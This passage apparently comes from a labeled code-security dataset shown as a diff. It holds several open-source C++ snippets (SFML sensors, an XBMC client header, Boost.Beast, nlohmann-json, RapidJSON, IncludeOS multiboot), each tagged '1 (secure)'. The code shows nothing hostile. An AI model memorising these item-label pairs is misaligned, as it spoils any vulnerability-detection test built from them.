|
686 |
+
{
|
687 |
+
return m_sensors[sensor].available;
|
688 |
+
}
|
689 |
+
|
690 |
+
|
691 |
+
////////////////////////////////////////////////////////////
|
692 |
+
void SensorManager::setEnabled(Sensor::Type sensor, bool enabled)
|
693 |
+
{
|
694 |
+
if (m_sensors[sensor].available)
|
695 |
+
{
|
696 |
+
m_sensors[sensor].enabled = enabled;
|
697 |
+
m_sensors[sensor].sensor.setEnabled(enabled);
|
698 |
+
}
|
699 |
+
else
|
700 |
+
{
|
701 |
+
err() << ""Warning: trying to enable a sensor that is not available (call Sensor::isAvailable to check it)""
|
702 |
+
<< std::endl;
|
703 |
+
}
|
704 |
+
}
|
705 |
+
|
706 |
+
|
707 |
+
////////////////////////////////////////////////////////////
|
708 |
+
bool SensorManager::isEnabled(Sensor::Type sensor) const
|
709 |
+
{
|
710 |
+
return m_sensors[sensor].enabled;
|
711 |
+
}
|
712 |
+
|
713 |
+
|
714 |
+
////////////////////////////////////////////////////////////
|
715 |
+
Vector3f SensorManager::getValue(Sensor::Type sensor) const
|
716 |
+
{
|
717 |
+
return m_sensors[sensor].value;
|
718 |
+
}
|
719 |
+
|
720 |
+
|
721 |
+
////////////////////////////////////////////////////////////
|
722 |
+
void SensorManager::update()
|
723 |
+
{
|
724 |
+
for (Item& item : m_sensors)
|
725 |
+
{
|
726 |
+
// Only process available sensors
|
727 |
+
if (item.available)
|
728 |
+
item.value = item.sensor.update();
|
729 |
+
}
|
730 |
+
}
|
731 |
+
|
732 |
+
|
733 |
+
////////////////////////////////////////////////////////////
|
734 |
+
SensorManager::SensorManager()
|
735 |
+
{
|
736 |
+
// Global sensor initialization
|
737 |
+
SensorImpl::initialize();
|
738 |
+
|
739 |
+
// Per sensor initialization
|
740 |
+
for (int i = 0; i < Sensor::Count; ++i)
|
741 |
+
{
|
742 |
+
// Check which sensors are available
|
743 |
+
m_sensors[i].available = SensorImpl::isAvailable(static_cast<Sensor::Type>(i));
|
744 |
+
|
745 |
+
// Open the available sensors
|
746 |
+
if (m_sensors[i].available)
|
747 |
+
{
|
748 |
+
if (m_sensors[i].sensor.open(static_cast<Sensor::Type>(i)))
|
749 |
+
{
|
750 |
+
m_sensors[i].sensor.setEnabled(false);
|
751 |
+
}
|
752 |
+
else
|
753 |
+
{
|
754 |
+
m_sensors[i].available = false;
|
755 |
+
err() << ""Warning: sensor "" << i << "" failed to open, will not be available"" << std::endl;
|
756 |
+
}
|
757 |
+
}
|
758 |
+
}
|
759 |
+
}
|
760 |
+
|
761 |
+
////////////////////////////////////////////////////////////
|
762 |
+
SensorManager::~SensorManager()
|
763 |
+
{
|
764 |
+
// Per sensor cleanup
|
765 |
+
for (Item& item : m_sensors)
|
766 |
+
{
|
767 |
+
if (item.available)
|
768 |
+
item.sensor.close();
|
769 |
+
}
|
770 |
+
|
771 |
+
// Global sensor cleanup
|
772 |
+
SensorImpl::cleanup();",1 (secure)
|
773 |
+
"#pragma once
|
774 |
+
|
775 |
+
#include <stdio.h>
|
776 |
+
#include <stdlib.h>
|
777 |
+
#include <string.h>
|
778 |
+
#include <sys/types.h>
|
779 |
+
#ifdef _WIN32
|
780 |
+
#include <winsock.h>
|
781 |
+
#else
|
782 |
+
#include <sys/socket.h>
|
783 |
+
#include <netinet/in.h>
|
784 |
+
#include <netdb.h>
|
785 |
+
#include <arpa/inet.h>
|
786 |
+
#endif
|
787 |
+
#include <vector>
|
788 |
+
#include <iostream>
|
789 |
+
#include <fstream>
|
790 |
+
#include <time.h>
|
791 |
+
|
792 |
+
#define STD_PORT 9777
|
793 |
+
|
794 |
+
#define MS_ABSOLUTE 0x01
|
795 |
+
//#define MS_RELATIVE 0x02
|
796 |
+
|
797 |
+
#define BTN_USE_NAME 0x01
|
798 |
+
#define BTN_DOWN 0x02
|
799 |
+
#define BTN_UP 0x04
|
800 |
+
#define BTN_USE_AMOUNT 0x08
|
801 |
+
#define BTN_QUEUE 0x10
|
802 |
+
#define BTN_NO_REPEAT 0x20
|
803 |
+
#define BTN_VKEY 0x40
|
804 |
+
#define BTN_AXIS 0x80
|
805 |
+
|
806 |
+
#define PT_HELO 0x01
|
807 |
+
#define PT_BYE 0x02
|
808 |
+
#define PT_BUTTON 0x03
|
809 |
+
#define PT_MOUSE 0x04
|
810 |
+
#define PT_PING 0x05
|
811 |
+
#define PT_BROADCAST 0x06
|
812 |
+
#define PT_NOTIFICATION 0x07
|
813 |
+
#define PT_BLOB 0x08
|
814 |
+
#define PT_LOG 0x09
|
815 |
+
#define PT_ACTION 0x0A
|
816 |
+
#define PT_DEBUG 0xFF
|
817 |
+
|
818 |
+
#define ICON_NONE 0x00
|
819 |
+
#define ICON_JPEG 0x01
|
820 |
+
#define ICON_PNG 0x02
|
821 |
+
#define ICON_GIF 0x03
|
822 |
+
|
823 |
+
#define MAX_PACKET_SIZE 1024
|
824 |
+
#define HEADER_SIZE 32
|
825 |
+
#define MAX_PAYLOAD_SIZE (MAX_PACKET_SIZE - HEADER_SIZE)
|
826 |
+
|
827 |
+
#define MAJOR_VERSION 2
|
828 |
+
#define MINOR_VERSION 0
|
829 |
+
|
830 |
+
#define LOGDEBUG 0
|
831 |
+
#define LOGINFO 1
|
832 |
+
#define LOGNOTICE 2
|
833 |
+
#define LOGWARNING 3
|
834 |
+
#define LOGERROR 4
|
835 |
+
#define LOGSEVERE 5
|
836 |
+
#define LOGFATAL 6
|
837 |
+
#define LOGNONE 7
|
838 |
+
|
839 |
+
#define ACTION_EXECBUILTIN 0x01
|
840 |
+
#define ACTION_BUTTON 0x02
|
841 |
+
|
842 |
+
class CAddress
|
843 |
+
{
|
844 |
+
private:
|
845 |
+
struct sockaddr_in m_Addr;
|
846 |
+
public:
|
847 |
+
CAddress(int Port = STD_PORT)
|
848 |
+
{
|
849 |
+
m_Addr.sin_family = AF_INET;
|
850 |
+
m_Addr.sin_port = htons(Port);
|
851 |
+
m_Addr.sin_addr.s_addr = INADDR_ANY;
|
852 |
+
memset(m_Addr.sin_zero, '\0', sizeof m_Addr.sin_zero);
|
853 |
+
}
|
854 |
+
|
855 |
+
CAddress(const char *Address, int Port = STD_PORT)
|
856 |
+
{
|
857 |
+
m_Addr.sin_port = htons(Port);
|
858 |
+
|
859 |
+
struct hostent *h;
|
860 |
+
if (Address == NULL || (h=gethostbyname(Address)) == NULL)
|
861 |
+
{
|
862 |
+
if (Address != NULL)
|
863 |
+
printf(""Error: Get host by name\n"");
|
864 |
+
|
865 |
+
m_Addr.sin_addr.s_addr = INADDR_ANY;
|
866 |
+
m_Addr.sin_family = AF_INET;
|
867 |
+
}
|
868 |
+
else
|
869 |
+
{
|
870 |
+
m_Addr.sin_family = h->h_addrtype;
|
871 |
+
m_Addr.sin_addr = *((struct in_addr *)h->h_addr);
|
872 |
+
}
|
873 |
+
memset(m_Addr.sin_zero, '\0', sizeof m_Addr.sin_zero);
|
874 |
+
}
|
875 |
+
|
876 |
+
void SetPort(int port)
|
877 |
+
{
|
878 |
+
m_Addr.sin_port = htons(port);
|
879 |
+
}
|
880 |
+
|
881 |
+
const sockaddr *GetAddress()
|
882 |
+
{
|
883 |
+
return ((struct sockaddr *)&m_Addr);
|
884 |
+
}
|
885 |
+
|
886 |
+
bool Bind(int Sockfd)
|
887 |
+
{
|
888 |
+
return (bind(Sockfd, (struct sockaddr *)&m_Addr, sizeof m_Addr) == 0);
|
889 |
+
}
|
890 |
+
};
|
891 |
+
|
892 |
+
class XBMCClientUtils
|
893 |
+
{
|
894 |
+
public:
|
895 |
+
XBMCClientUtils() = default;
|
896 |
+
~XBMCClientUtils() = default;
|
897 |
+
static unsigned int GetUniqueIdentifier()
|
898 |
+
{
|
899 |
+
static time_t id = time(NULL);
|
900 |
+
return id;
|
901 |
+
}
|
902 |
+
|
903 |
+
static void Clean()
|
904 |
+
{
|
905 |
+
#ifdef _WIN32
|
906 |
+
WSACleanup();
|
907 |
+
#endif
|
908 |
+
}
|
909 |
+
|
910 |
+
static bool Initialize()
|
911 |
+
{
|
912 |
+
#ifdef _WIN32
|
913 |
+
WSADATA wsaData;
|
914 |
+
if (WSAStartup(MAKEWORD(1, 1), &wsaData))
|
915 |
+
return false;
|
916 |
+
#endif
|
917 |
+
return true;
|
918 |
+
}
|
919 |
+
};
|
920 |
+
|
921 |
+
class CPacket",1 (secure)
|
922 |
+
"#ifndef BOOST_BEAST_WEBSOCKET_OPTION_HPP
|
923 |
+
#define BOOST_BEAST_WEBSOCKET_OPTION_HPP
|
924 |
+
|
925 |
+
#include <boost/beast/core/detail/config.hpp>
|
926 |
+
|
927 |
+
namespace boost {
|
928 |
+
namespace beast {
|
929 |
+
namespace websocket {
|
930 |
+
|
931 |
+
/** permessage-deflate extension options.
|
932 |
+
These settings control the permessage-deflate extension,
|
933 |
+
which allows messages to be compressed.
|
934 |
+
@note Objects of this type are used with
|
935 |
+
@ref beast::websocket::stream::set_option.
|
936 |
+
*/
|
937 |
+
struct permessage_deflate
|
938 |
+
{
|
939 |
+
/// `true` to offer the extension in the server role
|
940 |
+
bool server_enable = false;
|
941 |
+
|
942 |
+
/// `true` to offer the extension in the client role
|
943 |
+
bool client_enable = false;
|
944 |
+
|
945 |
+
/** Maximum server window bits to offer
|
946 |
+
@note Due to a bug in ZLib, this value must be greater than 8.
|
947 |
+
*/
|
948 |
+
int server_max_window_bits = 15;
|
949 |
+
|
950 |
+
/** Maximum client window bits to offer
|
951 |
+
@note Due to a bug in ZLib, this value must be greater than 8.
|
952 |
+
*/
|
953 |
+
int client_max_window_bits = 15;
|
954 |
+
|
955 |
+
/// `true` if server_no_context_takeover desired
|
956 |
+
bool server_no_context_takeover = false;
|
957 |
+
|
958 |
+
/// `true` if client_no_context_takeover desired
|
959 |
+
bool client_no_context_takeover = false;
|
960 |
+
|
961 |
+
/// Deflate compression level 0..9
|
962 |
+
int compLevel = 8;
|
963 |
+
|
964 |
+
/// Deflate memory level, 1..9
|
965 |
+
int memLevel = 4;
|
966 |
+
|
967 |
+
/// The minimum size a message should have to be compressed
|
968 |
+
std::size_t msg_size_threshold = 0;
|
969 |
+
};
|
970 |
+
|
971 |
+
} // websocket
|
972 |
+
} // beast
|
973 |
+
} // boost
|
974 |
+
|
975 |
+
#endif",1 (secure)
|
976 |
+
"#include <cstdlib>
|
977 |
+
#include <iostream>
|
978 |
+
#include <sstream>
|
979 |
+
|
980 |
+
using namespace std;
|
981 |
+
|
982 |
+
void build_code(int max_args)
|
983 |
+
{
|
984 |
+
stringstream ss;
|
985 |
+
ss << ""#define NLOHMANN_JSON_EXPAND( x ) x"" << endl;
|
986 |
+
ss << ""#define NLOHMANN_JSON_GET_MACRO("";
|
987 |
+
for (int i = 0 ; i < max_args ; i++)
|
988 |
+
ss << ""_"" << i + 1 << "", "";
|
989 |
+
ss << ""NAME,...) NAME"" << endl;
|
990 |
+
|
991 |
+
ss << ""#define NLOHMANN_JSON_PASTE(...) NLOHMANN_JSON_EXPAND(NLOHMANN_JSON_GET_MACRO(__VA_ARGS__, \\"" << endl;
|
992 |
+
for (int i = max_args ; i > 1 ; i--)
|
993 |
+
ss << ""NLOHMANN_JSON_PASTE"" << i << "", \\"" << endl;
|
994 |
+
ss << ""NLOHMANN_JSON_PASTE1)(__VA_ARGS__))"" << endl;
|
995 |
+
|
996 |
+
ss << ""#define NLOHMANN_JSON_PASTE2(func, v1) func(v1)"" << endl;
|
997 |
+
for (int i = 3 ; i <= max_args ; i++)
|
998 |
+
{
|
999 |
+
ss << ""#define NLOHMANN_JSON_PASTE"" << i << ""(func, "";
|
1000 |
+
for (int j = 1 ; j < i -1 ; j++)
|
1001 |
+
ss << ""v"" << j << "", "";
|
1002 |
+
ss << ""v"" << i-1 << "") NLOHMANN_JSON_PASTE2(func, v1) NLOHMANN_JSON_PASTE"" << i-1 << ""(func, "";
|
1003 |
+
for (int j = 2 ; j < i-1 ; j++)
|
1004 |
+
ss << ""v"" << j << "", "";
|
1005 |
+
ss << ""v"" << i-1 << "")"" << endl;
|
1006 |
+
}
|
1007 |
+
|
1008 |
+
cout << ss.str() << endl;
|
1009 |
+
}
|
1010 |
+
|
1011 |
+
int main(int argc, char** argv)
|
1012 |
+
{
|
1013 |
+
int max_args = 64;
|
1014 |
+
build_code(max_args);
|
1015 |
+
|
1016 |
+
return 0;
|
1017 |
+
}",1 (secure)
|
1018 |
+
"#ifndef RAPIDJSON_FILEWRITESTREAM_H_
|
1019 |
+
#define RAPIDJSON_FILEWRITESTREAM_H_
|
1020 |
+
|
1021 |
+
#include ""stream.h""
|
1022 |
+
#include <cstdio>
|
1023 |
+
|
1024 |
+
#ifdef __clang__
|
1025 |
+
RAPIDJSON_DIAG_PUSH
|
1026 |
+
RAPIDJSON_DIAG_OFF(unreachable-code)
|
1027 |
+
#endif
|
1028 |
+
|
1029 |
+
RAPIDJSON_NAMESPACE_BEGIN
|
1030 |
+
|
1031 |
+
//! Wrapper of C file stream for output using fwrite().
|
1032 |
+
/*!
|
1033 |
+
\note implements Stream concept
|
1034 |
+
*/
|
1035 |
+
class FileWriteStream {
|
1036 |
+
public:
|
1037 |
+
typedef char Ch; //!< Character type. Only support char.
|
1038 |
+
|
1039 |
+
FileWriteStream(std::FILE* fp, char* buffer, size_t bufferSize) : fp_(fp), buffer_(buffer), bufferEnd_(buffer + bufferSize), current_(buffer_) {
|
1040 |
+
RAPIDJSON_ASSERT(fp_ != 0);
|
1041 |
+
}
|
1042 |
+
|
1043 |
+
void Put(char c) {
|
1044 |
+
if (current_ >= bufferEnd_)
|
1045 |
+
Flush();
|
1046 |
+
|
1047 |
+
*current_++ = c;
|
1048 |
+
}
|
1049 |
+
|
1050 |
+
void PutN(char c, size_t n) {
|
1051 |
+
size_t avail = static_cast<size_t>(bufferEnd_ - current_);
|
1052 |
+
while (n > avail) {
|
1053 |
+
std::memset(current_, c, avail);
|
1054 |
+
current_ += avail;
|
1055 |
+
Flush();
|
1056 |
+
n -= avail;
|
1057 |
+
avail = static_cast<size_t>(bufferEnd_ - current_);
|
1058 |
+
}
|
1059 |
+
|
1060 |
+
if (n > 0) {
|
1061 |
+
std::memset(current_, c, n);
|
1062 |
+
current_ += n;
|
1063 |
+
}
|
1064 |
+
}
|
1065 |
+
|
1066 |
+
void Flush() {
|
1067 |
+
if (current_ != buffer_) {
|
1068 |
+
size_t result = std::fwrite(buffer_, 1, static_cast<size_t>(current_ - buffer_), fp_);
|
1069 |
+
if (result < static_cast<size_t>(current_ - buffer_)) {
|
1070 |
+
// failure deliberately ignored at this time
|
1071 |
+
// added to avoid warn_unused_result build errors
|
1072 |
+
}
|
1073 |
+
current_ = buffer_;
|
1074 |
+
}
|
1075 |
+
}
|
1076 |
+
|
1077 |
+
// Not implemented
|
1078 |
+
char Peek() const { RAPIDJSON_ASSERT(false); return 0; }
|
1079 |
+
char Take() { RAPIDJSON_ASSERT(false); return 0; }
|
1080 |
+
size_t Tell() const { RAPIDJSON_ASSERT(false); return 0; }
|
1081 |
+
char* PutBegin() { RAPIDJSON_ASSERT(false); return 0; }
|
1082 |
+
size_t PutEnd(char*) { RAPIDJSON_ASSERT(false); return 0; }
|
1083 |
+
|
1084 |
+
private:
|
1085 |
+
// Prohibit copy constructor & assignment operator.
|
1086 |
+
FileWriteStream(const FileWriteStream&);
|
1087 |
+
FileWriteStream& operator=(const FileWriteStream&);
|
1088 |
+
|
1089 |
+
std::FILE* fp_;
|
1090 |
+
char *buffer_;
|
1091 |
+
char *bufferEnd_;
|
1092 |
+
char *current_;
|
1093 |
+
};
|
1094 |
+
|
1095 |
+
//! Implement specialized version of PutN() with memset() for better performance.
|
1096 |
+
template<>
|
1097 |
+
inline void PutN(FileWriteStream& stream, char c, size_t n) {
|
1098 |
+
stream.PutN(c, n);
|
1099 |
+
}
|
1100 |
+
|
1101 |
+
RAPIDJSON_NAMESPACE_END
|
1102 |
+
|
1103 |
+
#ifdef __clang__
|
1104 |
+
RAPIDJSON_DIAG_POP
|
1105 |
+
#endif
|
1106 |
+
|
1107 |
+
#endif // RAPIDJSON_FILESTREAM_H_",1 (secure)
|
1108 |
+
"
|
1109 |
+
|
1110 |
+
#include <os>
|
1111 |
+
#include <kernel.hpp>
|
1112 |
+
#include <kprint>
|
1113 |
+
#include <boot/multiboot.h>
|
1114 |
+
#include <kernel/memory.hpp>
|
1115 |
+
|
1116 |
+
//#define DEBUG_MULTIBOOT
|
1117 |
+
#ifdef DEBUG_MULTIBOOT
|
1118 |
+
#undef debug
|
1119 |
+
#define debug(X,...) kprintf(X,##__VA_ARGS__);
|
1120 |
+
#define MYINFO(X,...) kprintf(""<Multiboot>"" X ""\n"", ##__VA_ARGS__)
|
1121 |
+
#undef INFO2
|
1122 |
+
#define INFO2(X,...) kprintf(""\t"" X ""\n"", ##__VA_ARGS__)
|
1123 |
+
#else
|
1124 |
+
#define debug(X,...)
|
1125 |
+
#define MYINFO(X,...) INFO(""Kernel"", X, ##__VA_ARGS__)
|
1126 |
+
#endif
|
1127 |
+
|
1128 |
+
using namespace util::bitops;
|
1129 |
+
using namespace util::literals;
|
1130 |
+
extern uintptr_t _end;
|
1131 |
+
#if defined(ARCH_aarch64)
|
1132 |
+
uint32_t dummy[24];
|
1133 |
+
uintptr_t __multiboot_addr=(uintptr_t)&dummy[0];
|
1134 |
+
#else
|
1135 |
+
extern uint32_t __multiboot_addr;
|
1136 |
+
#endif
|
1137 |
+
|
1138 |
+
static inline multiboot_info_t* bootinfo(uint32_t addr)
|
1139 |
+
{
|
1140 |
+
// NOTE: the address is 32-bit and not a pointer
|
1141 |
+
return (multiboot_info_t*) (uintptr_t) addr;
|
1142 |
+
}
|
1143 |
+
|
1144 |
+
multiboot_info_t* kernel::bootinfo()
|
1145 |
+
{
|
1146 |
+
return (multiboot_info_t*) (uintptr_t) __multiboot_addr;
|
1147 |
+
}
|
1148 |
+
|
1149 |
+
uintptr_t _multiboot_memory_end(uintptr_t boot_addr) {
|
1150 |
+
auto* info = bootinfo(boot_addr);
|
1151 |
+
if (info->flags & MULTIBOOT_INFO_MEMORY) {
|
1152 |
+
return 0x100000 + (info->mem_upper * 1024);
|
1153 |
+
}
|
1154 |
+
return os::Arch::max_canonical_addr;
|
1155 |
+
}
|
1156 |
+
|
1157 |
+
// Deterimine the end of multiboot provided data
|
1158 |
+
// (e.g. multiboot's data area as offset to the _end symbol)
|
1159 |
+
uintptr_t _multiboot_free_begin(uintptr_t boot_addr)
|
1160 |
+
{
|
1161 |
+
const auto* info = bootinfo(boot_addr);
|
1162 |
+
uintptr_t multi_end = reinterpret_cast<uintptr_t>(&_end);
|
1163 |
+
|
1164 |
+
debug(""* Multiboot begin: 0x%x \n"", info);
|
1165 |
+
if (info->flags & MULTIBOOT_INFO_CMDLINE
|
1166 |
+
and info->cmdline > multi_end)
|
1167 |
+
{
|
1168 |
+
debug(""* Multiboot cmdline @ 0x%x: %s \n"", info->cmdline, (char*)info->cmdline);
|
1169 |
+
// We can't use a cmdline that's either insde our ELF or pre-ELF area
|
1170 |
+
Expects(info->cmdline > multi_end
|
1171 |
+
or info->cmdline < 0x100000);
|
1172 |
+
|
1173 |
+
if (info->cmdline > multi_end) {
|
1174 |
+
auto* cmdline_ptr = (const char*) (uintptr_t) info->cmdline;
|
1175 |
+
// Set free begin to after the cmdline string,
|
1176 |
+
// but only if the cmdline is placed after image end
|
1177 |
+
const uintptr_t cmdline_end = info->cmdline + strlen(cmdline_ptr) + 1;
|
1178 |
+
if (cmdline_end > multi_end) multi_end = cmdline_end;
|
1179 |
+
}
|
1180 |
+
}
|
1181 |
+
|
1182 |
+
debug(""* Multiboot end: 0x%x \n"", multi_end);
|
1183 |
+
if (info->mods_count == 0) {
|
1184 |
+
return multi_end;
|
1185 |
+
}
|
1186 |
+
|
1187 |
+
auto* mods_list = (multiboot_module_t*) (uintptr_t) info->mods_addr;
|
1188 |
+
debug(""* Module list @ %p \n"",mods_list);
|
1189 |
+
|
1190 |
+
for (auto* mod = mods_list; mod < mods_list + info->mods_count; mod ++)
|
1191 |
+
{
|
1192 |
+
debug(""\t * Module @ %#x \n"", mod->mod_start);
|
1193 |
+
debug(""\t * Args: %s \n "", (char*) (uintptr_t) mod->cmdline);
|
1194 |
+
debug(""\t * End: %#x \n "", mod->mod_end);
|
1195 |
+
|
1196 |
+
if (mod->mod_end > multi_end)
|
1197 |
+
multi_end = mod->mod_end;
|
1198 |
+
}
|
1199 |
+
|
1200 |
+
debug(""* Multiboot end: 0x%x \n"", multi_end);
|
1201 |
+
return multi_end;
|
1202 |
+
}
|
1203 |
+
|
1204 |
+
void kernel::multiboot_mmap(void* start, size_t size)
|
1205 |
+
{
|
1206 |
+
const gsl::span<multiboot_memory_map_t> mmap {
|
1207 |
+
(multiboot_memory_map_t*) start,
|
1208 |
+
(int) (size / sizeof(multiboot_memory_map_t))
|
1209 |
+
};
|
1210 |
+
|
1211 |
+
for (const auto& map : mmap)
|
1212 |
+
{
|
1213 |
+
const char* str_type = map.type & MULTIBOOT_MEMORY_AVAILABLE ? ""FREE"" : ""RESERVED"";
|
1214 |
+
const uintptr_t addr = map.addr;
|
1215 |
+
const uintptr_t size = map.len;
|
1216 |
+
INFO2("" 0x%010zx - 0x%010zx %s (%zu Kb.)"",
|
1217 |
+
map.addr, map.addr + map.len - 1, str_type, map.len / 1024 );
|
1218 |
+
|
1219 |
+
if ((map.type & MULTIBOOT_MEMORY_AVAILABLE) == 0)
|
1220 |
+
{
|
1221 |
+
if (util::bits::is_aligned<4_KiB>(map.addr)) {
|
1222 |
+
os::mem::map({addr, addr, os::mem::Access::read | os::mem::Access::write, size},
|
1223 |
+
""Reserved (Multiboot)"");
|
1224 |
+
continue;
|
1225 |
+
}
|
1226 |
+
// For non-aligned addresses, assign
|
1227 |
+
os::mem::vmmap().assign_range({map.addr, map.addr + map.len-1, ""Reserved (Multiboot)""});
|
1228 |
+
}
|
1229 |
+
else
|
1230 |
+
{
|
1231 |
+
// Map as free memory
|
1232 |
+
}
|
1233 |
+
}
|
1234 |
+
}",1 (secure)
|